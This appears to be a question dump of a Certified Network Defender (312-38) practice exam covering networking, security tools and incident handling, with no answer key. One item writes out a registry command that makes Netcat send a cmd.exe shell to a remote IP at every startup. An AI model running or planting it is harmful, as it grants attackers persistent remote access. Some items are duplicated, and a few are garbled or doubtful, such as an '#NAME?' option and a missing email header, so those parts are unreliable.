
Certified Network Defender TEST B

Title of test:
Certified Network Defender TEST B

Description:
312-38 Exam - CND

Creation Date: 2023/12/30

Category: Others

Number of questions: 100

Rating:(4)
Content:

Which of the following are used as a cost estimating technique during the project planning stage? Each correct answer represents a complete solution. (Choose three.). Function point analysis. Program Evaluation Review Technique (PERT). Expert judgment. Delphi technique.

Which of the following provide an "always on" Internet access service when connecting to an ISP? Each correct answer represents a complete solution. (Choose two.). Digital modem. Cable modem. Analog modem. DSL.

Which of the following types of coaxial cable is used for cable TV and cable modems?. RG-62. RG-59. RG-58. RG-8.

Which of the following fields in the IPv6 header is decremented by 1 for each router that forwards the packet?. Flow label. Next header. Traffic class. Hop limit.

Which of the following is a type of computer security that deals with protection against spurious signals emitted by electrical equipment in the system?. Communication Security. Physical security. Emanation Security. Hardware security.

Which of the following network devices operate at the network layer of the OSI model? Each correct answer represents a complete solution. Choose all that apply. Router. Bridge. Repeater. Gateway.

Fill in the blank with the appropriate term. The ______________ layer establishes, manages, and terminates the connections between the local and remote application.(transport)(network)(session).

Fill in the blank with the appropriate term. ______________ management is an area of systems management that involves acquiring, testing, and installing multiple patches (code changes) to an administered computer system.(update)(scan)(patch).

Adam, a malicious hacker, has just succeeded in stealing a secure cookie via an XSS attack. He is able to replay the cookie even while the session is valid on the server. Which of the following is the most likely reason for this?. No encryption is applied. Two way encryption is applied. Encryption is performed at the network layer (layer 1 encryption). Encryption is performed at the application layer (single encryption key).

Fill in the blank with the appropriate word. A ______________ policy is defined as the document that describes the scope of an organization's security requirements.(document)(network)(security).

Which of the following is a Unix and Windows tool capable of intercepting traffic on a network segment and capturing username and password?. AirSnort. Ettercap. BackTrack. Aircrack.

Which of the following standards is a proposed enhancement to the 802.11a and 802.11b wireless LAN (WLAN) specifications that offers quality of service (QoS) features, including the prioritization of data, voice, and video transmissions?. 802.15. 802.11n. 802.11e. 802.11h.

Which of the following key features is used by TCP in order to regulate the amount of data sent by a host to another host on the network?. Sequence number. TCP timestamp. Congestion control. Flow control.

Which of the following representatives in the incident response process are included in the incident response team? Each correct answer represents a complete solution. Choose all that apply. Information security representative. Legal representative. Technical representative. Lead investigator. Human resources. Sales representative.

Which of the following is a device that provides local communication between the datalogger and a computer?. Controllerless modem. Optical modem. Acoustic modem. Short haul modem.

Which of the following plans is documented and organized for emergency response, backup operations, and recovery maintained by an activity as part of its security program that will ensure the availability of critical resources and facilitates the continuity of operations in an emergency situation?. Contingency Plan. Disaster Recovery Plan. Business Continuity Plan. Continuity Of Operations Plan.

Fill in the blank with the appropriate term. ______________ is the use of sensitive words in e-mails to jam the authorities that listen in on them by providing a form of a red herring and an intentional annoyance.(email phishing)(email)(email jamming).

Which of the following is a standard-based protocol that provides the highest level of VPN security?. L2TP. IP. PPP. IPSec.

You run the following command on the remote Windows server 2003 computer: c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe" What task do you want to perform by running this command? Each correct answer represents a complete solution. Choose all that apply. You want to perform banner grabbing. You want to put Netcat in the stealth mode. You want to add the Netcat command to the Windows registry. You want to set the Netcat to execute command any time.

Which of the following UTP cables uses four pairs of twisted cable and provides transmission speeds of up to 16 Mbps?. Category 5e. Category 3. Category 5. Category 6.

Which of the following protocols is used for inter-domain multicast routing and natively supports "source-specific multicast" (SSM)?. BGMP. DVMRP. OSPF. EIGRP.

You have just set up a wireless network for customers at a coffee shop. Which of the following are good security measures to implement? Each correct answer represents a complete solution. (Choose two.). Using WPA encryption. Not broadcasting SSID. Using WEP encryption. MAC filtering the router.

Which of the following are the various methods that a device can use for logging information on a Cisco router? Each correct answer represents a complete solution. Choose all that apply. Buffered logging. Syslog logging. NTP logging. Terminal logging. Console logging. SNMP logging.

Which of the following is a software tool used in passive attacks for capturing network traffic?. Sniffer. Intrusion detection system. Intrusion prevention system. Warchalking.

John works as an Incident manager for TechWorld Inc. His task is to set up a wireless network for his organization. For this, he needs to decide the appropriate devices and policies required to set up the network. Which of the following phases of the incident handling process will help him accomplish the task?. Containment. Recovery. Preparation. Eradication.

Fill in the blank with the appropriate term. A ______________ is a physical or logical subnetwork that adds an additional layer of security to an organization's Local Area Network. (VPN)(honeypot)(demilitarized zone).

Fill in the blank with the appropriate term. ______________ is a codename referring to investigations and studies of compromising emission (CE).(tempest)(test)(ping).

Which of the following router configuration modes changes terminal settings on a temporary basis, performs basic tests, and lists system information?. Global Config. Interface Config. Privileged EXEC. User EXEC.

Which of the following is the primary international body for fostering cooperative standards for telecommunications equipment and systems?. ICANN. IEEE. NIST. CCITT.

Which of the following is an exterior gateway protocol that communicates using a Transmission Control Protocol (TCP) and sends the updated router table information?. IGMP. IRDP. OSPF. BGP.

Which of the following statements are true about a wireless network? Each correct answer represents a complete solution. Choose all that apply. Data can be shared easily between wireless devices. It provides mobility to users to access a network. Data can be transmitted in different ways by using Cellular Networks, Mobitex, DataTAC, etc. It is easy to connect.

Which of the following is a device that receives a digital signal on an electromagnetic or optical transmission medium and regenerates the signal along the next leg of the medium?. Gateway. Repeater. Network adapter. Transceiver.

Mark works as a Network Administrator for Infonet Inc. The company has a Windows 2000 Active Directory domain-based network. The domain contains one hundred Windows XP Professional client computers. Mark is deploying an 802.11 wireless LAN on the network. The wireless LAN will use Wired Equivalent Privacy (WEP) for all the connections. According to the company's security policy, the client computers must be able to automatically connect to the wireless LAN. However, the unauthorized computers must not be allowed to connect to the wireless LAN and view the wireless network. Mark wants to configure all the wireless access points and client computers to act in accordance with the company's security policy. What will he do to accomplish this? Each correct answer represents a part of the solution. (Choose three.). Install a firewall software on each wireless access point. Configure the authentication type for the wireless LAN to Shared Key. Disable SSID Broadcast and enable MAC address filtering on all wireless access points. Broadcast SSID to connect to the access point (AP). Configure the authentication type for the wireless LAN to Open system. On each client computer, add the SSID for the wireless LAN as the preferred network.

Which of the following steps of the OPSEC process examines each aspect of the planned operation to identify OPSEC indicators that could reveal critical information and then compare those indicators with the adversary's intelligence collection capabilities identified in the previous action?. Analysis of Threats. Analysis of Vulnerabilities. Assessment of Risk. Identification of Critical Information. Application of Appropriate OPSEC Measures.

Which of the following is a communication protocol that multicasts messages and information among all member devices in an IP multicast group?. ICMP. IGMP. BGP. EGP.

In which of the following attacks do computers act as zombies and work together to send out bogus messages, thereby increasing the amount of phony traffic?. Smurf attack. Buffer-overflow attack. DDoS attack. Bonk attack.

Attacks are classified into which of the following? Each correct answer represents a complete solution. Choose all that apply. Active attack. Session hijacking. Passive attack. Replay attack.

Which of the following is a technique for gathering information about a remote network protected by a firewall?. Firewalking. Warchalking. Wardriving. Wardialing.

Which of the following is an Internet application protocol used for transporting Usenet news articles between news servers and for reading and posting articles by end-user client applications?. NNTP. BOOTP. DCAP. NTP.

Which of the following attacks is a class of brute force attacks that depends on the higher likelihood of collisions found between random attack attempts and a fixed degree of permutations?. Phishing attack. Replay attack. Birthday attack. Dictionary attack.

Which of the following is a digital telephone/telecommunication network that carries voice, data, and video over an existing telephone network infrastructure?. PPP. Frame relay. ISDN. X.25.

Fill in the blank with the appropriate term. ______________ is a prime example of a high-interaction honeypot.(honeyLAN)(honeypot)(honeynet).

Fill in the blank with the appropriate term. ______________ is an enumeration technique used to glean information about computer systems on a network and the services running its open ports.(scan)(banner grabbing)(nslookup).

Which of the following steps are required in an idle scan of a closed port? Each correct answer represents a part of the solution. Choose all that apply. The attacker sends a SYN/ACK to the zombie. The zombie's IP ID increases by only 1. In response to the SYN, the target sends a RST. The zombie ignores the unsolicited RST, and the IP ID remains unchanged. The zombie's IP ID increases by 2.

Which of the following is a mechanism that helps in ensuring that only the intended and authorized recipients are able to read data?. Integrity. Data availability. Confidentiality. Authentication.

Which of the following help in estimating and totaling up the equivalent money value of the benefits and costs to the community of projects for establishing whether they are worthwhile? Each correct answer represents a complete solution. Choose all that apply. Business Continuity Planning. Benefit-Cost Analysis. Disaster recovery. Cost-benefit analysis.

Which of the following steps will NOT make a server fault tolerant? Each correct answer represents a complete solution. (Choose two.). Adding a second power supply unit. Performing regular backup of the server. Adding one more same sized disk as mirror on the server. Implementing cluster servers' facility. Encrypting confidential data stored on the server.

This is a Windows-based tool that is used for the detection of wireless LANs using the IEEE 802.11a, 802.11b, and 802.11g standards. The main features of these tools are as follows: It displays the signal strength of a wireless network, MAC address, SSID, channel details, etc. It is commonly used for the following purposes: a. War driving b. Detecting unauthorized access points c. Detecting causes of interference on a WLAN d. WEP ICV error tracking e. Making Graphs and Alarms on 802.11 Data, including Signal Strength. This tool is known as __________. Kismet. Absinthe. THC-Scan. NetStumbler.

Which of the following are the common security problems involved in communications and email? Each correct answer represents a complete solution. Choose all that apply. False message. Message digest. Message replay. Message repudiation. Message modification. Eavesdropping. Identity theft.

Which of the following are the six different phases of the Incident handling process? Each correct answer represents a complete solution. Choose all that apply. Containment. Identification. Post mortem review. Preparation. Lessons learned. Recovery. Eradication.

Which of the following steps of the OPSEC process examines each aspect of the planned operation to identify OPSEC indicators that could reveal critical information and then compare those indicators with the adversary's intelligence collection capabilities identified in the previous action?. Analysis of Threats. Application of Appropriate OPSEC Measures. Identification of Critical Information. Analysis of Vulnerabilities. Assessment of Risk.

Which of the following statements are true about an IPv6 network? Each correct answer represents a complete solution. Choose all that apply. For interoperability, IPv4 addresses use the last 32 bits of IPv6 addresses. It increases the number of available IP addresses. It uses longer subnet masks than those used in IPv4. It provides improved authentication and security. It uses 128-bit addresses.

Which of the following transmission modes of communication is one-way?. Half duplex. full-duplex mode. #NAME?. root mode.

Which of the following is designed to detect unwanted changes by observing the flame of the environment associated with combustion?. Fire extinguishing system. None. Gaseous fire-extinguishing systems. sprinkler. Smoke alarm system.

Which of the following features is used to generate spam on the Internet by spammers and worms?. AutoComplete. SMTP relay. Server Message Block (SMB) signing. AutoFill.

Which of the following tools is described below? It is a set of tools that are used for sniffing passwords, e-mail, and HTTP traffic. Some of its tools include arpredirect, macof, tcpkill, tcpnice, filesnarf, and mailsnarf. It is highly effective for sniffing both switched and shared networks. It uses the arpredirect and macof tools for switching across switched networks. It can also be used to capture authentication information for FTP, telnet, SMTP, HTTP, POP, NNTP, IMAP, etc. Dsniff. Cain. Libnids. LIDS.

Which of the following IP class addresses are not allotted to hosts? Each correct answer represents a complete solution. Choose two. Class C. Class D. Class A. Class B. Class E.

A war dialer is a tool that is used to scan thousands of telephone numbers to detect vulnerable modems. It provides an attacker unauthorized access to a computer. Which of the following tools can an attacker use to perform war dialing? Each correct answer represents a complete solution. Choose two. ToneLoc. Wingate. THC-Scan. NetStumbler.

Which of the following protocols is used to share information between routers to transport IP Multicast packets among networks?. RSVP. DVMRP. RPC. LWAPP.

Which of the following is a network interconnectivity device that translates different communication protocols and is used to connect dissimilar network technologies?. Gateway. Router. Bridge. Switch.

Which of the following is a tool that runs on the Windows OS and analyzes iptables log messages to detect port scans and other suspicious traffic?. PSAD. Hping. NetRanger. Nmap.

Fill in the blank with the appropriate term. A ______________ is a physical or logical subnetwork that contains and exposes external services of an organization to a larger network.(VPN)(LAN)(demilitarized zone).

Which of the following statements are true about security risks? Each correct answer represents a complete solution. (Choose three.). They are considered an indicator of threats coupled with vulnerability. They can be removed completely by taking proper actions. They can be analyzed and measured by the risk analysis process. They can be mitigated by reviewing and taking responsible actions based on possible risks.

Which of the following statements are TRUE about Demilitarized zone (DMZ)? Each correct answer represents a complete solution. Choose three. The purpose of a DMZ is to add an additional layer of security to the Local Area Network of an organization. Hosts in the DMZ have full connectivity to specific hosts in the internal network. Demilitarized zone is a physical or logical sub-network that contains and exposes external services of an organization to a larger un-trusted network. In a DMZ configuration, most computers on the LAN run behind a firewall connected to a public network like the Internet.

Which of the following is a management process that provides a framework for promoting quick recovery and the capability for an effective response to protect the interests of its brand, reputation, and stakeholders?. Log analysis. Patch management. Incident handling. Business Continuity Management.

Jason works as a System Administrator for www.company.com Inc. The company has a Windows-based network. Sam, an employee of the company, accidentally changes some of the applications and system settings. He complains to Jason that his system is not working properly. To troubleshoot the problem, Jason diagnoses the internals of his computer and observes that some changes have been made in Sam's computer registry. To rectify the issue, Jason has to restore the registry. Which of the following utilities can Jason use to accomplish the task? Each correct answer represents a complete solution. Choose three. Resplendent registrar. Regedit.exe. Reg.exe. EventCombMT.

Which of the following are the valid steps for securing routers? Each correct answer represents a complete solution. Choose three. Use a password that is easy to remember for a router's administrative console. Use a complex password for a router's administrative console. Configure access list entries to prevent unauthorized connections and traffic routing. Keep routers updated with the latest security patches.

In which of the following attacks does an attacker successfully insert an intermediary software or program between two communicating hosts?. Session hijacking. Denial-of-Service. Man-in-the-middle. Buffer overflow.

Which of the following is a standard-based protocol that provides the highest level of VPN security?. IPSec. IP. PPP. L2TP.

Which of the following is a computer networking protocol used by hosts to retrieve IP address assignments and other configuration information?. SNMP. ARP. DHCP. Telnet.

Adam, a malicious hacker, has just succeeded in stealing a secure cookie via an XSS attack. He is able to replay the cookie even while the session is valid on the server. Which of the following is the most likely reason for this?. Encryption is performed at the network layer (layer 1 encryption). Encryption is performed at the application layer (single encryption key). No encryption is applied. Two way encryption is applied.

Which of the following is a maintenance protocol that permits routers and host computers to swap basic control information when data is sent from one computer to another?. IGMP. ICMP. SNMP. BGP.

Which of the following procedures is intended to help security personnel identify, mitigate, and recover from malware events, such as unauthorized access to systems or data, denial-of-service or unauthorized changes to the system hardware, software, or information?. None. disaster survival plan. Cyber Incident Response Plan. A resident of the emergency plan. Crisis communications guidelines.

John visits an online shop that stores the IDs and prices of the items to buy in a cookie. After selecting the items that he wants to buy, the attacker changes the price of the item to 1. Original cookie values: ItemID1=2 - ItemPrice1=900 - ItemID2=1 - ItemPrice2=200 - Modified cookie values: ItemID1=2 - ItemPrice1=1 - ItemID2=1 - ItemPrice2=1 - Now, he clicks the Buy button, and the prices are sent to the server that calculates the total price. Which of the following hacking techniques is John performing?. Computer-based social engineering. Man-in-the-middle attack. Cookie poisoning. Cross site scripting.

Which of the following policies is used to add additional information about the overall security posture and serves to protect employees and organizations from inefficiency or ambiguity?. User policy. Group policy. Issue-Specific Security Policy. IT policy.

Which of the following UTP cables uses four pairs of twisted cable and provides transmission speeds of up to 16 Mbps?. Category 5e. Category 5. Category 3. Category 6.

John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He is using a tool to crack the wireless encryption keys. The description of the tool is as follows: `It is a Linux-based WLAN WEP cracking tool that recovers encryption keys. It operates by passively monitoring transmissions. It uses Ciphertext Only Attack and captures approximately 5 to 10 million packets to decrypt the WEP keys.` Which of the following tools is John using to crack the wireless encryption keys?. Cain. PsPasswd. Kismet. AirSnort.

Which of the following statements are true about volatile memory? Each correct answer represents a complete solution. Choose two. The content is stored permanently and even the power supply is switched off. A volatile storage device is faster in reading and writing data. Read only memory (ROM) is an example of volatile memory. It is computer memory that requires power to maintain the stored information.

You are a professional Computer Hacking forensic investigator. You have been called to collect evidence of buffer overflow and cookie snooping attacks. Which of the following logs will you review to accomplish the task? Each correct answer represents a complete solution. Choose three. Program logs. Web server logs. Event logs. System logs.

John works as an Ethical Hacker for www.company.com Inc. He wants to find out the ports that are open in www.company.com's server using a port scanner. However, he does not want to establish a full TCP connection. Which of the following scanning techniques will he use to accomplish this task?. TCP SYN. Xmas tree. TCP SYN/ACK. TCP FIN.

Fill in the blank with the appropriate term. ______________ is a prime example of a high-interaction honeypot.(Honeynet)(Honeypot)(filesharing).

Which of the following tools is an open source protocol analyzer that can capture traffic in real time?. NetResident. Wireshark. Bridle. NetWitness. None.

Which of the following tools are NOT used for logging network activities in the Linux operating system? Each correct answer represents a complete solution. Choose two. PsLoggedOn. PsGetSid. Timbersee. Swatch.

Fill in the blank with the appropriate term. The ______________ model is a description framework for computer network protocols and is sometimes called the Internet Model or the DoD Model.(TCP/IP)(NAT)(UDP).

Which of the following is a software tool used in passive attacks for capturing network traffic?. Intrusion prevention system. Intrusion detection system. Warchalking. Sniffer.

Which of the following types of coaxial cable is used for cable TV and cable modems?. RG-8. RG-62. RG-59. RG-58.

In an Ethernet peer-to-peer network, which of the following cables is used to connect two computers, using RJ-45 connectors and Category-5 UTP cable?. Serial. Loopback. Crossover. Parallel.

You work as a Network Security Analyzer. You got a suspicious email while working on a forensic project. Now, you want to know the IP address of the sender so that you can analyze various information such as the actual location, domain information, operating system being used, contact information, etc. of the email sender with the help of various tools and resources. You also want to check whether this email is fake or real. You know that analysis of email headers is a good starting point in such cases. The email header of the suspicious email is given below: 209.191.91.180. 141.1.1.1. 172.16.10.90. 216.168.54.25.

Which of the following is the practice of sending unwanted e-mail messages, frequently with commercial content, in large quantities to an indiscriminate set of recipients? Each correct answer represents a complete solution. Choose two. Email spoofing. Junk mail. E-mail spam. Email jamming.

Which of the following is a worldwide organization that aims to establish, refine, and promote Internet security standards?. ANSI. WASC. IEEE. ITU.

Which of the following statements are TRUE about Demilitarized zone (DMZ)? Each correct answer represents a complete solution. Choose three. In a DMZ configuration, most computers on the LAN run behind a firewall connected to a public network like the Internet. Demilitarized zone is a physical or logical sub-network that contains and exposes external services of an organization to a larger un-trusted network. The purpose of a DMZ is to add an additional layer of security to the Local Area Network of an organization. Hosts in the DMZ have full connectivity to specific hosts in the internal network.

Which of the following network scanning tools is a TCP/UDP port scanner that works as a ping sweeper and hostname resolver?. Hping. SuperScan. Netstat. Nmap.

Which of the following is a network layer protocol used to obtain an IP address for a given hardware (MAC) address?. IP. PIM. RARP. ARP.

Fill in the blank with the appropriate term. A ______________ is a term in computer terminology used for a trap that is set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems.(Honeynet)(DMZ)(Honeypot).

Which of the following is a network maintenance protocol of the TCP/IP protocol suite that is responsible for the resolution of IP addresses to media access control (MAC) addresses of a network interface card (NIC)?. DHCP. ARP. PIM. RARP.

What is the range for registered ports?. 1024 through 49151. 0 through 1023. Above 65535. 49152 through 65535.

How many layers are present in the TCP/IP model?. 10. 5. 4. 7.

In which of the following transmission modes is communication uni-directional?. Root mode. Full-duplex mode. Half-duplex mode. Simplex mode.

CSMA/CD is specified in which of the following IEEE standards?. 802.3. 802.2. 802.1. 802.15.

What is the response of an Xmas scan if a port is either open or filtered?. RST. No response. FIN. PUSH.
